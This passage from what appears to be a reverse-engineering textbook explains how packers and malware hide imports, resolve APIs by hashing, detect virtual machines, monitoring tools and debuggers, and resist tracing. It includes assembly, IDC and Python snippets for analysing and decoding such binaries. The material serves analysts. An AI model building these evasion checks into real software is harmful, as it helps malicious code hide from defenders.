UPX1:0040888C or al, al

UPX1:0040888E jz short loc_40886C

UPX1:00408890 mov ecx, edi

UPX1:00408892 push edi

UPX1:00408893 dec eax

UPX1:00408894 repne scasb

UPX1:00408896 push ebp

Y UPX1:00408897 call dword ptr [esi+8090h] ; GetProcAddress

UPX1:0040889D or eax, eax

UPX1:0040889F jz short loc_4088A8

Z UPX1:004088A1 mov [ebx], eax ; Save to import table

UPX1:004088A3 add ebx, 4

UPX1:004088A6 jmp short loc_408889

Listing 21-1: Import table reconstruction in UPX

This example contains an outer loop responsible for calling LoadLibraryA16

X and an inner loop responsible for calling GetProcAddress Y. Following each

successful call to GetProcAddress, the newly retrieved function address is stored

into the reconstructed import table Z.
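
The nested-loop structure of Listing 21-1 may be easier to see in a higher-level form. The following is a simplified model, not a translation of the UPX stub: load_library and get_proc_address are hypothetical stand-ins for LoadLibraryA and GetProcAddress, the addresses in FAKE_LIBRARIES are invented, and the byte-level layout of UPX's compressed name data is ignored.

```python
# Stand-ins for loaded DLLs: each "library" maps function names to addresses.
FAKE_LIBRARIES = {
    "KERNEL32.DLL": {"LoadLibraryA": 0x10001000, "ExitProcess": 0x10002000},
    "USER32.DLL": {"ExitWindowsEx": 0x20001000},
}


def load_library(name):
    """Hypothetical stand-in for LoadLibraryA: returns a module 'handle'."""
    return FAKE_LIBRARIES[name]


def get_proc_address(module, name):
    """Hypothetical stand-in for GetProcAddress: returns 0 when not found."""
    return module.get(name, 0)


def rebuild_imports(wanted):
    """wanted: list of (library name, [function names]) recovered by the stub."""
    import_table = []
    for library_name, function_names in wanted:      # outer loop: one library
        module = load_library(library_name)
        for function_name in function_names:         # inner loop: one function
            address = get_proc_address(module, function_name)
            if address == 0:
                # The listing branches to loc_4088A8 here (not shown).
                raise LookupError(function_name)
            import_table.append(address)              # mov [ebx], eax / add ebx, 4
    return import_table


table = rebuild_imports([
    ("KERNEL32.DLL", ["LoadLibraryA", "ExitProcess"]),
    ("USER32.DLL", ["ExitWindowsEx"]),
])
print([hex(entry) for entry in table])
```

When reading a real stub, identifying these two calls and the store that follows them is usually enough to locate where the reconstructed import table lives in memory.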

These loops are executed as the last portion of the UPX de-obfuscation

stub, because each function takes string pointer parameters that point to

either a library name or a function name, and the associated strings are held

within the compressed data region to avoid detection by the strings utility. As

a result, library loading in UPX cannot take place until the required strings

have been decompressed.

Returning to the tElock example, a different problem presents itself. With

only two imported functions, neither of which is LoadLibraryA or GetProcAddress,

how can the tElock utility perform the function-resolution tasks that were

performed by UPX? All Windows processes depend on kernel32.dll, which

means that it is present in memory for all processes. If a program can locate

kernel32.dll, a relatively straightforward process may be followed to locate any

function within the DLL, including LoadLibraryA and GetProcAddress. As shown

previously, with these two functions in hand, it is possible to load any addi-

tional libraries required by the process and locate all required functions

within those libraries. In his paper “Understanding Windows Shellcode,”17

Skape discusses techniques for doing exactly this. While tElock does not use

the exact techniques detailed by Skape, there are many parallels, and the net

effect is to obscure the details of the loading and linking process. Without

carefully tracing the program’s instructions, it is extremely easy to overlook

the loading of a library or the lookup of a function address. The following

small code fragment illustrates the manner in which tElock attempts to

locate the address of LoadLibraryA:

.shrink:0041D1E4 cmp dword ptr [eax], 64616F4Ch

.shrink:0041D1EA jnz short loc_41D226

.shrink:0041D1EC cmp dword ptr [eax+4], 7262694Ch

.shrink:0041D1F3 jnz short loc_41D226

.shrink:0041D1F5 cmp dword ptr [eax+8], 41797261h

.shrink:0041D1FC jnz short loc_41D226

16. Many Windows functions that accept string arguments come in two versions: one that accepts

ASCII strings and one that accepts Unicode strings. The ASCII versions of these functions carry

an A suffix, while the Unicode versions carry a W suffix.

17. See http://www.hick.org/code/skape/papers/win32-shellcode.pdf, specifically Chapter 3,

“Shellcode Basics,” and section 3.3, “Resolving Symbol Addresses.”

It is immediately obvious that several comparisons are taking place in

rapid succession. What may not be immediately clear is the purpose of these

comparisons. Reformatting the operands used in each comparison sheds a

little light on the code, as seen here:

.shrink:0041D1E4 cmp dword ptr [eax], 'daoL'

.shrink:0041D1EA jnz short loc_41D226

.shrink:0041D1EC cmp dword ptr [eax+4], 'rbiL'

.shrink:0041D1F3 jnz short loc_41D226

.shrink:0041D1F5 cmp dword ptr [eax+8], 'Ayra'

.shrink:0041D1FC jnz short loc_41D226

Each hexadecimal constant is actually a sequence of four ASCII charac-

ters, which taken in order (recall that the x86 is a little-endian processor and

we need to read the characters in reverse order) spell LoadLibraryA. If the

three comparisons succeed, then tElock has located the export table entry

for LoadLibraryA, and in a few short operations, the address of this function

will be obtained and available for use in loading additional libraries. An

interesting characteristic of tElock’s approach to function lookup is that it

is somewhat resistant to strings analysis because the 4-byte constants embed-

ded directly in the program’s instructions do not look like more standard,

null-terminated strings and thus do not get included in strings lists generated

by IDA.
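
The byte-order reasoning above can be confirmed outside of IDA with Python's struct module. This is a small sketch; the function name decode_dwords is illustrative, and the three constants are the immediate operands from the tElock fragment.

```python
import struct

# Immediate operands of the three cmp instructions in the tElock fragment.
CONSTANTS = [0x64616F4C, 0x7262694C, 0x41797261]


def decode_dwords(values):
    """Lay each 32-bit value out as x86 stores it in memory (little-endian)."""
    return b"".join(struct.pack("<I", v) for v in values).decode("ascii")


print(decode_dwords(CONSTANTS))  # LoadLibraryA
```

Packing with the "<I" format writes the least significant byte first, which is the same order in which the comparison sees the bytes of the export name in memory.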

Manually reconstructing a program’s import table through careful analysis

of the program’s code is made easier in the case of UPX and tElock because,

ultimately, they both contain ASCII character data that we can use to deter-

mine exactly which libraries and which functions are being referenced.

Skape’s paper details a function-resolution process in which no strings at

all appear within the code. The basic idea discussed in the paper is to pre-

compute a unique hash18 value for the name of each function that you need

to resolve. To resolve each function, a search is conducted through a library’s

exported names table. Each name in the table is hashed, and the resulting

hash is compared against the precomputed hash value for the desired func-

tion. If the hashes match, the desired function has been located, and you can

easily find its address in the library’s export address table. In order to stati-

cally analyze binaries obfuscated in this manner, you need to understand the

hashing algorithm used for each function name and apply that algorithm to

all of the names exported by the library that the program is searching. With

a complete table of hashes in hand, you will be able to do a simple lookup of

each hash that you encounter in the program to determine which function

18. A hash function is a mathematical process that derives a fixed-size result (4 bytes, for example)

from an arbitrary-sized input (such as a string).

the hash references.19 A portion of such a table, generated for kernel32.dll,

might look like this:

X GetProcAddress : 8A0FB5E2

GetProcessAffinityMask : B9756EFE

GetProcessHandleCount : B50EB87C

GetProcessHeap : C246DA44

GetProcessHeaps : A18AAB23

GetProcessId : BE05ED07

Note that the hash values are specific to the hash function being used

within a particular binary and are likely to vary from one binary to another.

Using this particular table, if the hash value 8A0FB5E2 X was encountered

within a program, we could quickly determine that the program was attempt-

ing to look up the address of the GetProcAddress function.
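
Building such a lookup table takes only a few lines once the hash function is understood. The sketch below uses a rotate-right-by-13 additive hash purely as an example; the hash function behind the table above is not stated, so the values produced here should not be expected to match it. The names name_hash and build_lookup are illustrative, and in practice the list of exported names would be extracted from the DLL rather than typed in.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def name_hash(name):
    """Rotate-right-by-13 additive hash, used here purely as an example."""
    result = 0
    for ch in name.encode("ascii"):
        result = (ror32(result, 13) + ch) & 0xFFFFFFFF
    return result


def build_lookup(exported_names):
    """Map each hash back to the name that produced it."""
    return {name_hash(n): n for n in exported_names}


exports = ["GetProcAddress", "GetProcessHeap", "GetProcessId", "LoadLibraryA"]
lookup = build_lookup(exports)
for value, name in sorted(lookup.items()):
    print(f"{name} : {value:08X}")
```

With the table in hand, any 32-bit constant that the program compares against computed hashes can be translated back to a function name with a single dictionary lookup.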

Skape’s use of hash values to resolve function names was originally

developed and documented for use in exploit payloads for Windows vulner-

abilities; however, hash values have been adopted for use in obfuscated pro-

grams as well. The WinLicense obfuscation utility is one example that makes

use of such hashing techniques to disguise its behavior.

A final note on import tables is that, interestingly, IDA is sometimes able

to offer you a clue that something is not quite right with a program’s import

table. Obfuscated Windows binaries often have sufficiently altered import

tables that IDA will notify you that something seems out of the ordinary with

such a binary. Figure 21-3 shows the warning dialog that IDA displays in such

cases.

Figure 21-3: Mangled imports segment warning dialog

This dialog provides one of the earliest indications that a binary may

have been obfuscated in some manner and should serve as a warning that the

binary may be difficult to analyze. Thus, you should take care while analyzing

the binary.

Targeted Attacks on Analysis Tools

This category of anti–reverse engineering capability is mentioned only

because of its unique potential to hinder reverse engineering efforts. Most

reverse engineering tools can be viewed as highly specialized parsers that

19. Hex-Rays discusses using IDA’s debugging capabilities to compute such hashes here:

http://www.hexblog.com/?p=93.

process input data to provide some sort of summary information or detail

display. As software, these tools are not immune to the same types of vulner-

abilities that affect all other software. Specifically, incorrect handling of user-

supplied data may, in some cases, lead to exploitable conditions.

In addition to the techniques we have discussed thus far, programmers

intent on preventing analysis of their software may opt for a more active form

of anti–reverse engineering. By properly crafting input files, it may be possible

to create a program that is both valid enough to execute properly and malformed

enough to exploit a vulnerability in a reverse engineering tool. Such

vulnerabilities, while uncommon, have been documented, including vulnerabilities

in IDA.20 The goal of the attacker is to exploit the fact that a piece of

malware is likely to get loaded into IDA at some point. At a minimum, the

attacker may achieve a denial of service in which IDA always crashes before a

database can be created; alternatively, the attacker may gain access to the

analyst’s computer and associated network. Users concerned with this type

of attack should consider performing all initial analysis tasks in a sandbox

environment. For example, you might run a copy of IDA in a sandbox to

create the initial database for all binaries. The initial database (which in

theory is free from any malicious capability) can then be distributed to

additional analysts, who need never touch the original binary file.

Anti–Dynamic Analysis Techniques

None of the anti–static analysis techniques covered in the past few sections

have any effect whatsoever on whether a program will actually execute or

not. In fact, while they may make it difficult for you to comprehend the true

behavior of a program using static analysis techniques alone, they can’t pre-

vent the program from executing, or they would render a program useless

from the start and therefore eliminate the need to analyze the program at all.

Given that a program must run in order for it to do any work, dynamic

analysis aims to observe the behavior of a program in motion (while it is run-

ning) rather than observe the program at rest (using static analysis while the

program is not running). In this section we briefly summarize some of the

more common anti–dynamic analysis techniques. For the most part, these

techniques have little effect on static analysis tools; however, where there is

overlap, we will point this out. We will return to discuss the impact of many

of these techniques on IDA’s integrated debugger beginning in Chapter 24.

Detecting Virtualization

One of the most common choices for configuring a sandbox environment is to make use of virtualization software, such as VMware, to provide an execution environment for malicious software (or, for that matter, any other software of interest). The advantage of such environments is that they typically offer checkpoint and rollback capabilities that facilitate rapid restoration of the sandbox to a known clean state. The primary disadvantage of using such environments as the foundation for a sandbox is the fact that it is fairly easy (especially on 32-bit x86 platforms) for a program to detect that it is running within a virtualized environment. Under the assumption that virtualization equates to observation, many programs that want to remain undetected simply choose to shut down once they determine that they are running within a virtual machine.

20. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0115. More detail is available at http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=189.

The following list describes a few of the techniques that have been used

by programs running in virtualized environments to determine that they are

running within a virtual machine rather than on native hardware.

Detection of virtualization-specific software

Users often install helper applications within virtual machines to

facilitate communications between a virtual machine and its host operat-

ing system or simply to improve performance within the virtual machine.

The VMware Tools collection is one example of such software. The

presence of such software is easily detected by programs running within

the virtual machine. For example, when VMware Tools is installed into a

Microsoft Windows virtual machine, it creates Windows registry entries

that can be read by any program. VMware Tools is rarely required in

order to run malware within a virtual environment and should not be

installed so as to eliminate such trivially detectable traces of the virtual

machine.

Detection of virtualization-specific hardware

Virtual machines make use of virtual hardware abstraction layers to pro-

vide the interface between the virtual machine and the host computer’s

native hardware. Characteristics of the virtual hardware are often easily

detectable by software running within the virtual machine. For example,

VMware has been assigned its own organizationally unique identifiers

(OUI)21 for use with its virtualized network adapters. Observing a

VMware-specific OUI is a good indication that a program is running

within a virtual machine. Note that it is usually possible to modify the

MAC address assigned to virtual network adapters using configuration

options on the host computer.

Detection of virtual machine–specific behaviors

Some virtualization platforms contain backdoor-style communications

channels to facilitate communications between a virtual machine and its

host software. For example, the following five lines may be used to deter-

mine if you are running within a VMware virtual machine:22

  mov eax, 0x564D5868   ; 'VMXh'
  mov ecx, 10
  xor ebx, ebx
  mov dx, 0x5658        ; 'VX'
➊ in eax, dx

The sequence will result in the EBX register containing the value 0x564D5868 if you are inside a virtual machine. If you are not within a virtual machine, the code will result in either an exception or no change to EBX, depending on the host operating system in use. This instruction sequence takes advantage of the fact that the x86 in instruction ➊ is generally not used or allowed in user-space programs; however, within VMware, the instruction sequence can be used to test for the presence of the channel used by VMware guest operating systems to communicate with their host operating system. This channel is used by VMware Tools, for example, to facilitate the exchange of data (such as clipboard contents) between the host and guest operating systems.

21. An OUI makes up the first three bytes of a network adapter’s factory-assigned MAC address.

22. See http://www.codeproject.com/KB/system/VmDetect.aspx by Elias Bachaalany.

Detection of processor-specific behavioral changes

Perfect virtualization is a difficult thing to achieve. Ideally a program

should not be able to detect any difference between a virtualized environ-

ment and native hardware. However, this is seldom the case. Joanna

Rutkowska developed her redpill23 VMware-detection technique after

observing behavioral differences between the operation of the x86 sidt

instruction on native hardware and the same instruction executed within

a virtual machine environment.

Though it is not the first paper on the topic, “On the Cutting Edge:

Thwarting Virtual Machine Detection” by Tom Liston and Ed Skoudis24

presents a nice overview of virtual machine–detection techniques.
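To make the hardware-based check from the list above concrete, the following is a minimal Python sketch of an OUI comparison. The four prefixes are the OUIs commonly cited as registered to VMware; treat the set as an assumption to verify against the IEEE registry. The function names are illustrative only and do not come from any tool discussed here.

```python
# OUIs commonly cited as registered to VMware (assumption: verify against
# the IEEE registry before relying on this list).
VMWARE_OUIS = {"00:05:69", "00:0c:29", "00:1c:14", "00:50:56"}


def normalize_mac(mac):
    """Return the MAC address as lowercase, colon-separated hex pairs."""
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError("expected a 6-byte MAC address: %r" % mac)
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def looks_like_vmware(mac):
    """True if the first three bytes (the OUI) match a known VMware prefix."""
    return normalize_mac(mac)[:8] in VMWARE_OUIS
```

An analyst can use the same comparison in reverse: if a guest's adapter reports one of these prefixes, changing the MAC address in the virtual machine's configuration removes this particular indicator.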

Detecting Instrumentation

Following creation of your sandbox environment and prior to executing any

program you want to observe, you need to ensure that instrumentation is in

place to properly collect and record information about the behavior of the

program you are analyzing. A wide variety of tools exists for performing

such monitoring tasks. Two widely used examples include Process Monitor,25

from the Sysinternals group26 at Microsoft, and Wireshark.27 Process Monitor

is a utility capable of monitoring certain activities associated with any run-

ning Windows process, including accesses to the Windows registry and file

system activity. Wireshark is a network packet capture and analysis tool often

used to analyze the network traffic generated by malicious software.

23. See http://www.invisiblethings.org/papers/redpill.html.

24. See http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf.

25. See http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx.

26. See http://technet.microsoft.com/en-us/sysinternals/default.aspx.

27. See http://www.wireshark.org/.

Malware authors with a sufficient level of paranoia may program their software to search for running instances of such monitoring programs. Techniques range from scanning the active process list for process names known to be associated with such monitoring software to scanning the title bar text for all active Windows applications to search for known strings. Deeper searches can be performed, with some software going so far as to search for specific characteristics associated with Windows GUI components used within certain instrumentation software. For example, the WinLicense obfuscation/protection program uses the following function call to attempt to determine whether the Filemon (a predecessor of Process Monitor) utility is currently executing:

if (FindWindow("FilemonClass", NULL)) {

//exit because Filemon is running

}

In this case, the FindWindow function is being used to search for a top-level

application window based on the registered class name ("FilemonClass")

of the window rather than the window’s title. If a window of the requested

class is located, then Filemon is assumed to be executing, and the program

terminates.
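The two simpler searches mentioned above (process names and title bar text) amount to set membership and substring tests. The sketch below models them in Python over plain lists so that it runs anywhere. The blocklist entries and search strings are hypothetical examples, not lists taken from any real protector, and gathering the actual process list or window titles is left out.

```python
# Hypothetical blocklist; real samples carry their own lists of names.
MONITOR_NAMES = {"procmon.exe", "filemon.exe", "regmon.exe", "wireshark.exe"}


def find_monitors(process_names, blocklist=MONITOR_NAMES):
    """Return the blocklisted names found in process_names (case-insensitive)."""
    seen = {name.lower() for name in process_names}
    return sorted(seen & set(blocklist))


def titles_matching(titles, needles=("process monitor", "wireshark")):
    """Return the window titles that contain any of the search strings."""
    return [t for t in titles if any(n in t.lower() for n in needles)]
```

Because both checks depend on fixed strings, renaming a monitoring tool's executable defeats the first, while the window-class check used by WinLicense is harder to sidestep since the class name is registered by the tool itself.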

Detecting Debuggers

Moving beyond simple observation of a program, the use of a debugger allows

an analyst to take complete control of the execution of the program under

analysis. A common use of a debugger with obfuscated programs is to run

the obfuscated program just long enough to complete any decompression or

decryption tasks and then utilize the debugger’s memory-access features to

extract the de-obfuscated process image from memory. In most cases, standard

static analysis tools and techniques can be used to complete the analysis of

the extracted process image.

The authors of obfuscation utilities are well aware of such debugger-

assisted de-obfuscation techniques, so they have developed measures to

attempt to defeat the use of debuggers for execution of their obfuscated

programs. Programs that detect the presence of a debugger often choose to

terminate rather than proceed with any operations that might allow an analyst

to more easily determine the behavior of the program.

Techniques for detecting the presence of debuggers range from simple

queries to the operating system via well-known API functions, such as the

Windows IsDebuggerPresent function, to lower-level checks for memory or

processor artifacts resulting from the use of a debugger. An example of the

latter includes detecting that a processor’s trace (single-step) flag is set.

Detection of specific debuggers is also possible in some cases. For example,

SoftICE, a Windows kernel debugger, can be detected through the presence

of the "\\.\NTICE" device, which is used to communicate with the debugger.

As long as you know what to look for, there is nothing terribly tricky

about trying to detect a debugger, and attempts to do so are easily observed

during static analysis (unless anti–static analysis techniques are employed

simultaneously). For more information on debugger detection, consult

Nicolas Falliere’s article “Windows Anti-Debug Reference,”28 which provides

a comprehensive overview of Windows anti-debugging techniques.29 In addi-

tion, OpenRCE maintains an Anti Reverse Engineering Techniques Data-

base,30 which contains a number of debugger-specific techniques.
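As a rough illustration of the two ends of that range, the Python sketch below wraps the Windows IsDebuggerPresent call through ctypes and tests the trace flag in a saved EFLAGS value. The helper names are made up for this example. The API wrapper returns None on platforms other than Windows, and obtaining an EFLAGS value in the first place (for example, with pushf in native code) is outside what Python can show.

```python
import ctypes
import sys

TRAP_FLAG = 0x100  # bit 8 of EFLAGS: the trace (single-step) flag


def trap_flag_set(eflags):
    """True if the trace flag is set in a saved EFLAGS value."""
    return bool(eflags & TRAP_FLAG)


def is_debugger_present():
    """Query kernel32!IsDebuggerPresent; returns None when not on Windows."""
    if sys.platform != "win32":
        return None
    return bool(ctypes.windll.kernel32.IsDebuggerPresent())
```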

Preventing Debugging

If a debugger manages to remain undetectable, there are still a number of

techniques available to thwart its use. These additional techniques attempt to

confound the debugger by introducing spurious breakpoints, clearing hard-

ware breakpoints, hindering disassembly to make selection of appropriate

breakpoint addresses difficult, or preventing the debugger from attaching

to a process in the first place. Many of the techniques discussed in Nicolas

Falliere’s article are geared toward preventing debuggers from operating

correctly.

Intentionally generating exceptions is one means by which a program

may attempt to hinder debugging. In most cases, an attached debugger will

catch the exception, and the user of the debugger is faced with the task of

analyzing why the exception occurred and whether to pass the exception

along to the program being debugged. In the case of a software breakpoint

such as the x86 int 3, it may be difficult to distinguish a software interrupt

generated by the underlying program from one that results from an actual

debugger breakpoint. This confusion is exactly the effect that is desired by

the creator of the obfuscated program. In such cases, careful analysis of the

disassembly listing to understand the true program flow is usually possible,

though the level of effort for static analysis is raised somewhat.

Encoding portions of a program in some manner has the dual effect of

hindering static analysis because disassembly is not possible and of hindering

debugging because placing breakpoints is difficult. Even if the start of each

instruction is known, software breakpoints cannot be placed until the instruc-

tions have actually been decoded, as altering the instructions by inserting a

software breakpoint is likely to result in a failed decryption of the obfuscated

code and a resulting crash of the program when execution reaches the

intended breakpoint.

Alternatively, some de-obfuscation routines compute checksum values

over ranges of bytes within the process. If one or more software breakpoints

have been set within the range over which a checksum is being computed,

the resulting checksum will be incorrect, and the program is likely to abort.
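The effect of a software breakpoint on such a check is easy to demonstrate. The following Python sketch uses a simple additive checksum as a stand-in (an assumption; each packer uses its own routine) and shows how a debugger's int 3 patch, the single byte 0xCC, changes the result.

```python
INT3 = 0xCC  # one-byte x86 software breakpoint opcode


def checksum(data):
    """Additive 32-bit checksum; a stand-in for a packer's own routine."""
    return sum(data) & 0xFFFFFFFF


def set_breakpoint(code, offset):
    """Return (patched_copy, saved_byte), mimicking a debugger's int 3 patch."""
    patched = bytearray(code)
    saved = patched[offset]
    patched[offset] = INT3
    return patched, saved
```

Restoring the saved byte before the checksum routine runs, or using hardware breakpoints that leave the code bytes untouched, keeps the computed value intact.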

The Shiva ELF obfuscation tool for Linux makes use of a technique called

mutual ptrace to prevent the use of a debugger in analyzing Shiva’s behavior.

28. See http://www.symantec.com/connect/articles/windows-anti-debug-reference/.

29. See http://pferrie.tripod.com/papers/unpackers.pdf/ by Peter Ferrie.

30. See http://www.openrce.org/reference_library/anti_reversing/.

Shiva takes advantage of the fact that a process may be ptraced by only

one other process at any given time. Early in its execution, the Shiva process

forks to create a copy of itself. The original Shiva process immediately per-

forms a ptrace attach operation on the newly forked child. The newly forked

child process, in turn, immediately attaches to its parent process. If either

attach operation fails, Shiva terminates under the assumption that another

debugger is being used to monitor the Shiva process. If both operations suc-

ceed, then no other debugger can be used to attach to the running Shiva

pair, and Shiva can continue to run without fear of being observed. While

operating in this manner, either Shiva process may alter the state of the

other, making it difficult to determine, using static analysis techniques, what

the exact control flow path is through the Shiva binary.
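The single-tracer rule that mutual ptrace relies on can be modeled without touching the real ptrace API. The Python sketch below is only a toy model of that rule, with made-up names (TraceTable, shiva_style_startup); it does not call ptrace and is not Shiva's actual code.

```python
class TraceTable:
    """Toy model of the rule that a process has at most one tracer."""

    def __init__(self):
        self.tracer_of = {}  # tracee name -> tracer name

    def attach(self, tracer, tracee):
        """Record tracer as the tracer of tracee; fail if one already exists."""
        if tracee in self.tracer_of:
            return False
        self.tracer_of[tracee] = tracer
        return True


def shiva_style_startup(table, parent, child):
    """True if parent and child manage to attach to each other."""
    return table.attach(parent, child) and table.attach(child, parent)
```

In this model, a debugger that attaches first causes the startup check to fail, and a debugger that arrives after a successful startup finds both processes already traced.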

Static De-obfuscation of Binaries Using IDA

At this point you may be wondering how, given all of the anti–reverse engi-

neering techniques available, it is possible to analyze software that a program-

mer is intent on keeping secret. Given that these techniques target both static

analysis tools and dynamic analysis tools, what is the best approach to take in

revealing a program’s hidden behavior? Unfortunately, there is no single solu-

tion that fits all cases equally well. In most cases, the solution depends on

your skill set and the tools available to you. If your analysis tool of choice is a

debugger, then you will need to develop strategies for circumventing debug-

ger detection and prevention protections. If your preferred analysis tool is a

disassembler, you will need to develop strategies for obtaining an accurate dis-

assembly and, in cases in which self-modifying code is encountered, for mim-

icking the behavior of that code in order to properly update your disassembly

listings.

In this section we will discuss two techniques for dealing with self-modifying code in a static analysis environment (that is, without executing the code). Static analysis may be your only option for cases in which you are unwilling (because of hostile code) or unable (because of a lack of hardware or appropriate sandbox environment) to analyze a program while controlling it with a debugger.

PROCESS TRACING

The ptrace, or process tracing, API is available on many Unix systems and provides a mechanism for one process to monitor and control the execution of another process. The GNU debugger (gdb) is one of the more well-known applications that makes use of the ptrace API. Using the ptrace API, a ptrace parent process may attach to and control the execution of a ptrace child process. In order to begin controlling a process, a parent process must first attach to the child process that it seeks to control. Once attached, the child process is stopped anytime it receives a signal, and the parent is notified of this fact via the POSIX wait function, at which point the parent may choose to alter or inspect the state of the child process before instructing the child process to continue execution. Once a parent process has attached to a child process, no other process may attach to the same child process until the tracing parent chooses to detach from the child process.

Script-Oriented De-obfuscation

Because IDA may be used to disassemble binaries developed for a number of

different CPU types, it is not uncommon to analyze a binary developed for an

entirely different platform than the one on which you are running IDA. For

example, you may be asked to analyze a Linux x86 binary even though you

happen to run the Windows version of IDA, or you may be asked to analyze a

MIPS or ARM binary even though IDA runs only on x86 platforms. In such

cases you may not have access to dynamic analysis tools, such as debuggers,

suitable for use in performing dynamic analysis on the binary you have been

given. When such a binary has been obfuscated by encoding portions of the

program, you may have no other option than to create an IDA script that will

mimic the de-obfuscating stage of the program in order to properly decode

the program and disassemble the decoded instructions and data.

This may seem like a daunting task. However, in many cases the decod-

ing stages of an obfuscated program make use of only a small subset of a

processor’s instruction set, so familiarizing yourself with the necessary opera-

tions may not require an understanding of the entire instruction set for the

target CPU.

Chapter 15 presented an algorithm for developing scripts that emulate

the behavior of portions of a program. In the following example, we will

utilize those steps to develop a simple IDC script to decode a program that

has been encrypted with the Burneye ELF encryption tool. In our example

program, execution begins with the instructions in Listing 21-2.

  LOAD:05371035 start proc near
  LOAD:05371035
➊ LOAD:05371035         push    off_5371008
➋ LOAD:0537103B         pushf
➌ LOAD:0537103C         pusha
➍ LOAD:0537103D         mov     ecx, dword_5371000
  LOAD:05371043         jmp     loc_5371082
  ...
  LOAD:05371082 loc_5371082:            ; CODE XREF: start+E↑j
➎ LOAD:05371082         call    sub_5371048
  LOAD:05371087         sal     byte ptr [ebx-2Bh], 1
  LOAD:0537108A         pushf
  LOAD:0537108B         xchg    al, [edx-11h]
  LOAD:0537108E         pop     ss
  LOAD:0537108F         xchg    eax, esp
  LOAD:05371090         cwde
  LOAD:05371091         aad     8Eh
  LOAD:05371093         push    ecx
➏ LOAD:05371094         out     dx, eax
  LOAD:05371095         add     [edx-57E411A0h], bh
  LOAD:0537109B         push    ss
  LOAD:0537109C         rcr     dword ptr [esi+0Ch], cl
  LOAD:0537109F         push    cs
  LOAD:053710A0         sub     al, 70h
  LOAD:053710A2         cmp     ch, [eax+6Eh]
  LOAD:053710A5         cmp     dword ptr ds:0CBD35372h, 9C38A8BCh
  LOAD:053710AF         and     al, 0F4h
➐ LOAD:053710B1         db 67h

Listing 21-2: Burneye startup sequence and obfuscated code

The program begins by pushing the contents of memory location 05371008h onto the stack ➊ before pushing the CPU flags ➋ and then pushing all CPU registers ➌. The purpose of these instructions is not immediately clear, so we simply file this information away for later. Next, the ECX register is loaded with the contents of memory location 5371000h ➍. According to the algorithm presented in Chapter 15, we need to declare a variable named ecx at this point and initialize it from memory using IDC’s Dword function, as shown here:

auto ecx;
ecx = Dword(0x5371000); //from instruction 0537103D

Following an unconditional jump, the program calls function sub_5371048 ➎, which has the side effect of pushing address 05371087h (the return address) onto the stack. Note that the disassembled instructions that follow the call instruction begin to make less and less sense. The out instruction ➏ is not generally encountered in user-space code, while IDA is unable to disassemble an instruction at address 053710B1h ➐. These are both indications that something is not quite right with this binary (that and the fact that the Functions window lists only two functions).

At this point, analysis needs to continue with function sub_5371048, which

is shown in Listing 21-3.

  LOAD:05371048 sub_5371048 proc near   ; CODE XREF: start:loc_5371082↓p
➊ LOAD:05371048         pop     esi
➋ LOAD:05371049         mov     edi, esi
➌ LOAD:0537104B         mov     ebx, dword_5371004
  LOAD:05371051         or      ebx, ebx
➎ LOAD:05371053         jz      loc_537107F
➍ LOAD:05371059         xor     edx, edx
➏ LOAD:0537105B loc_537105B:            ; CODE XREF: sub_5371048+35↓j
  LOAD:0537105B         mov     eax, 8
➐ LOAD:05371060 loc_5371060:            ; CODE XREF: sub_5371048+2B↓j
  LOAD:05371060         shrd    edx, ebx, 1
  LOAD:05371064         shr     ebx, 1
  LOAD:05371066         jnb     loc_5371072
  LOAD:0537106C         xor     ebx, 0C0000057h
  LOAD:05371072 loc_5371072:            ; CODE XREF: sub_5371048+1E↑j
  LOAD:05371072         dec     eax
  LOAD:05371073         jnz     short loc_5371060
  LOAD:05371075         shr     edx, 18h
  LOAD:05371078         lodsb
  LOAD:05371079         xor     al, dl
  LOAD:0537107B         stosb
  LOAD:0537107C         dec     ecx
  LOAD:0537107D         jnz     short loc_537105B
  LOAD:0537107F loc_537107F:            ; CODE XREF: sub_5371048+B↑j
  LOAD:0537107F         popa
  LOAD:05371080         popf
  LOAD:05371081         retn

Listing 21-3: Main Burneye decoding function

Closer inspection reveals that this is not a typical function in that it begins by immediately popping the return address off the stack into the ESI register ➊. Recalling that the saved return address was 05371087h, and taking into account the initialization of EDI ➋, EBX ➌, and EDX ➍, our script grows to the following:

auto ecx, esi, edi, ebx, edx;
ecx = Dword(0x5371000); //from instruction 0537103D
esi = 0x05371087;       //from instruction 05371048
edi = esi;              //from instruction 05371049
ebx = Dword(0x5371004); //from instruction 0537104B
edx = 0;                //from instruction 05371059

Following these initializations, the function performs a test on the value contained in the EBX register ➎ before entering an outer loop ➏ and an inner loop ➐. The remaining logic of the function is captured in the following completed script. Within the script, comments are used to relate script actions to the corresponding actions in the preceding disassembly listing.

  auto ecx, esi, edi, ebx, edx, eax, cf;
  ecx = Dword(0x5371000);   //from instruction 0537103D
  esi = 0x05371087;         //from instruction 05371048
  edi = esi;                //from instruction 05371049
  ebx = Dword(0x5371004);   //from instruction 0537104B
  if (ebx != 0) {           //from instructions 05371051 and 05371053
     edx = 0;               //from instruction 05371059
     do {
        eax = 8;            //from instruction 0537105B
        do {
           //IDC does not offer an equivalent of the x86 shrd instruction so we
           //need to derive the behavior using several operations
➊          edx = (edx >> 1) & 0x7FFFFFFF; //perform unsigned shift right one bit
           cf = ebx & 1;                  //remember the low bit of ebx
           if (cf == 1) {                 //cf represents the x86 carry flag
              edx = edx | 0x80000000;     //shift in the low bit of ebx if it is 1
           }
           ebx = (ebx >> 1) & 0x7FFFFFFF; //perform unsigned shift right one bit
           if (cf == 1) {                 //from instruction 05371066
              ebx = ebx ^ 0xC0000057;     //from instruction 0537106C
           }
           eax--;                         //from instruction 05371072
        } while (eax != 0);               //from instruction 05371073
➋       edx = (edx >> 24) & 0xFF;         //perform unsigned shift right 24 bits
➌       eax = Byte(esi++);                //from instruction 05371078
        eax = eax ^ edx;                  //from instruction 05371079
➍       PatchByte(edi++, eax);            //from instruction 0537107B
        ecx--;                            //from instruction 0537107C
     } while (ecx != 0);                  //from instruction 0537107D
  }

